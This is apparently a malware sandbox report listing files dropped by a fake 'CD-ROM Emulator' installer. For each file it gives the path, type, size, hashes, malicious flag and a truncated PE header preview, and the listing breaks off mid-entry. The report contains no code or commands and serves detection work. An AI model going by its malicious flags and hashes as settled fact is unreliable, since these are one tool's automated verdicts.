Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\SDL2.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1007104
Entropy (8bit):	6.652666405660804
Encrypted:	false
SSDEEP:	24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
MD5:	AE58662A16410481B477B78B8D47460B
SHA1:	FB8B1BA166913C18EB00F8CA53439D0F4EE54359
SHA-256:	A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
SHA-512:	93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\avutil-56.dll (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	698382
Entropy (8bit):	6.476081490774289
Encrypted:	false
SSDEEP:	12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
MD5:	7C4C4A4D5684E8AACDC6B118A601A7BB
SHA1:	64C8CC24339D73909916E303AB08A253DD49FE3F
SHA-256:	D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
SHA-512:	DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\cdromemulator.exe (copy)

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	data
Category:	dropped
Size (bytes):	3743536
Entropy (8bit):	6.601284193319676
Encrypted:	false
SSDEEP:	98304:Juio/mCP0v21j4LSVLDWAU3jLE2/Q2Iakq:W/ZP91n6zLEYIakq
MD5:	2761FC85D5329E67A14BE1300092536E
SHA1:	EC055135B3A09D6E760B1F11A1DE9EEE25FD6214
SHA-256:	5384738DAA07648648040C6CCF0F946C6DB5ECEDB5BE8B1EF469DAC8A7DD3AAC
SHA-512:	BB684B2BDBD231DCB85876A3B0CB502CD3757FE2914B3EAD208E7995344BD10AB38C9E06047C11F3D8BAABFADD582667DA76A0F5E514E753AA9A3D7837BCB63F
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...UxN^.....................0...................@..........................P9..........................................................z..............................................................................@............................text...z........................... ..`.rdata...B.......P..................@..@.data....S...P...0...P..............@....rsrc...............................@..@.geo7.... ...0..0...................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-35RU5.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	127192
Entropy (8bit):	6.479927027421408
Encrypted:	false
SSDEEP:	1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
MD5:	8B2A6E8419A8A4E7D3FD023D97455FB9
SHA1:	2547A1F94FB4F83B7C133A3E285EE11FAA155E84
SHA-256:	7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
SHA-512:	44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-5E5MG.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	555894
Entropy (8bit):	3.4167624637949925
Encrypted:	false
SSDEEP:	6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
MD5:	77A96C1C8E72D12BE4DFA5600A67E0F4
SHA1:	F1A94189F7DA47DB26E332024C255AFAA085A654
SHA-256:	E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
SHA-512:	267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........v..$......#...#.:...r...............P.....k......................................@... .................................t............................................................Z.........................\|............................text....8.......:..................`.P`.data...D....P.......>..............@.0..rdata..$....`.......@..............@.`@/4......L....`.......@..............@.0@.bss.........p........................0..edata...............L..............@.0@.idata..t............N..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc........... ...V..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-836TM.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129038
Entropy (8bit):	6.508174898498455
Encrypted:	false
SSDEEP:	3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
MD5:	3D8C24A40935FB27FC494FC6147E6EA8
SHA1:	C26B6949C34AADB8271E124CE08F511BE5033A04
SHA-256:	F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
SHA-512:	2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-CJI63.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-E277M.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	data
Category:	dropped
Size (bytes):	3743536
Entropy (8bit):	6.601284193319676
Encrypted:	false
SSDEEP:	98304:Juio/mCP0v21j4LSVLDWAU3jLE2/Q2Iakq:W/ZP91n6zLEYIakq
MD5:	2761FC85D5329E67A14BE1300092536E
SHA1:	EC055135B3A09D6E760B1F11A1DE9EEE25FD6214
SHA-256:	5384738DAA07648648040C6CCF0F946C6DB5ECEDB5BE8B1EF469DAC8A7DD3AAC
SHA-512:	BB684B2BDBD231DCB85876A3B0CB502CD3757FE2914B3EAD208E7995344BD10AB38C9E06047C11F3D8BAABFADD582667DA76A0F5E514E753AA9A3D7837BCB63F
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...UxN^.....................0...................@..........................P9..........................................................z..............................................................................@............................text...z........................... ..`.rdata...B.......P..................@..@.data....S...P...0...P..............@....rsrc...............................@..@.geo7.... ...0..0...................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-GFKU8.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	3.8280681998470794
Encrypted:	false
SSDEEP:	12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
MD5:	09204E71E9F3B624E909FB20DEFE6EF5
SHA1:	2374900EBB8D9BB7127217DAE828A949B8E7938B
SHA-256:	D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
SHA-512:	7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
Malicious:	false
Reputation:	unknown
Preview:	..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

C:\Users\user\AppData\Local\CD-ROM Emulator\is-KCHS2.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1065100
Entropy (8bit):	7.300961775371533
Encrypted:	false
SSDEEP:	24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
MD5:	B7DF9B43BF812DDAF60C99732C1AB273
SHA1:	4A90353C8B2845008483854642B711E917F9CEEF
SHA-256:	74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
SHA-512:	DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..:......#...#.....4.................... f................................V>....@... ......................P.......`..............................................................0.......................$a...............................text...............................`.P`.data...T...........................@.0..rdata..............................@.`@/4.......Q.......R..................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....,....p......................@.0..tls................................@.0..rsrc...............................@.0..reloc...............$..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-KKEVI.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1007104
Entropy (8bit):	6.652666405660804
Encrypted:	false
SSDEEP:	24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
MD5:	AE58662A16410481B477B78B8D47460B
SHA1:	FB8B1BA166913C18EB00F8CA53439D0F4EE54359
SHA-256:	A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
SHA-512:	93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-KL11C.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	125637
Entropy (8bit):	6.2640431186303145
Encrypted:	false
SSDEEP:	3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
MD5:	6231B452E676ADE27CA0CEB3A3CF874A
SHA1:	F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
SHA-256:	9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
SHA-512:	F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-M5JQ4.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	716789
Entropy (8bit):	6.514218708009607
Encrypted:	false
SSDEEP:	12288:STPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuYVwRxyF3:aPcYn5c/rPx37/zHBA6pDp2mIEiYCRx4
MD5:	20952E95790242AF37F40CFB1C24C7B2
SHA1:	69B38126E8F9ADB07B1566A27E7A3653C37CD999
SHA-256:	7EFF45B8BE1AB0D08B723548D6AEB3EC9361CEA76AD6A6AE30B86CA40D87A1E9
SHA-512:	064C491E3D466E30CC2DC7A09F11564F6A35CE63468575C162C1E8C4B150E9C2D11178A18CC0191F32E401C8E51F45282792DF7E19D728A521C6E23251E3F490
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-NARCG.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105784
Entropy (8bit):	6.258144336244945
Encrypted:	false
SSDEEP:	1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
MD5:	0C6452935851B7CDB3A365AECD2DD260
SHA1:	83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
SHA-256:	F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
SHA-512:	5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-PC6U4.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	176200
Entropy (8bit):	6.647007817777345
Encrypted:	false
SSDEEP:	1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
MD5:	6896DC57D056879F929206A0A7692A34
SHA1:	D2F709CDE017C42916172E9178A17EB003917189
SHA-256:	8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
SHA-512:	CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-UD4UM.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	40974
Entropy (8bit):	6.485702128133584
Encrypted:	false
SSDEEP:	768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
MD5:	F47E78AD658B2767461EA926060BF3DD
SHA1:	9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
SHA-256:	602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
SHA-512:	216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-VAQO3.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	698382
Entropy (8bit):	6.476081490774289
Encrypted:	false
SSDEEP:	12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
MD5:	7C4C4A4D5684E8AACDC6B118A601A7BB
SHA1:	64C8CC24339D73909916E303AB08A253DD49FE3F
SHA-256:	D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
SHA-512:	DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.......... ...........................................,.....}.....@... ......................@+..>....+.$.....+.h.....................+.l1..........................d-........................+.4............................text...............................`.P`.data...............................@.`..rdata.............................@.`@/4...........`.......B..............@.0@.bss....4. ..@........................`..edata...>...@+..@..................@.0@.idata..$.....+......^..............@.0..CRT....,.....+......n..............@.0..tls..........+......p..............@.0..rsrc...h.....+......r..............@.0..reloc..l1....+..2...v..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\CD-ROM Emulator\is-VSFOK.tmp

Process:	C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68552
Entropy (8bit):	6.1042544770100395
Encrypted:	false
SSDEEP:	768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
MD5:	F06B0761D27B9E69A8F1220846FF12AF
SHA1:	E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
SHA-256:	E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
SHA-512:	5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
